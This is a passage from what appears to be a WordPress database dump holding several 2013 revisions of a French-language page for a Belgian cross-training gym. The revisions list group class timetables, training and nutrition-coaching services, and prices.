zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:39:04', '2013-10-05 08:39:04', '', 11, 'http://www.crosstrainingcenter.be/11-revision-117/', 0, 'revision', '', 0),
(345, 1, '2013-10-05 08:37:45', '2013-10-05 08:37:45', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\">18h<br>TRX</td>\r\n<td class=\"tcellule\">17h30<br>CARDIO</td>\r\n<td class=\"tcellule\">18h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">17h30<br>GLFE</td>\r\n<td class=\"tcellule\">17h30<br>TRX</td>\r\n<td class=\"tcellule\">17h30<br>TRX</td>\r\n<td class=\"tcellule\">11h<br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\">18h30<br>GLFE</td>\r\n<td class=\"tcellule\">18h15<br>TRX</td>\r\n<td class=\"tcellule\">18h30<br>CARDIO</td>\r\n<td class=\"tcellule\">18h15<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">18h15<br>GLFE</td>\r\n<td class=\"tcellule\">11h30<br>GLFE</td>\r\n<td class=\"tcellule\">11h30<br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\">19h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">19h<br>GLFE</td>\r\n<td class=\"tcellule\">19h<br>TRX</td>\r\n<td class=\"tcellule\">19h<br>CARDIO</td>\r\n<td class=\"tcellule\">19h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">12h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">12h<br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\">19h45<br>CARDIO</td>\r\n<td class=\"tcellule\">19h30<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">19h45<br>GLFE</td>\r\n<td class=\"tcellule\">19h15<br>TRX</td>\r\n<td class=\"tcellule\">19h45<br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:37:45', '2013-10-05 08:37:45', '', 11, 'http://www.crosstrainingcenter.be/11-revision-116/', 0, 'revision', '', 0),
(349, 1, '2013-10-05 08:49:46', '2013-10-05 08:49:46', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:49:46', '2013-10-05 08:49:46', '', 11, 'http://www.crosstrainingcenter.be/11-revision-120/', 0, 'revision', '', 0),
(351, 1, '2013-10-05 08:51:38', '2013-10-05 08:51:38', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:51:38', '2013-10-05 08:51:38', '', 11, 'http://www.crosstrainingcenter.be/11-revision-122/', 0, 'revision', '', 0),
(348, 1, '2013-10-05 08:48:06', '2013-10-05 08:48:06', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>19h</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tcellule\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"tcellule\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcellule\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 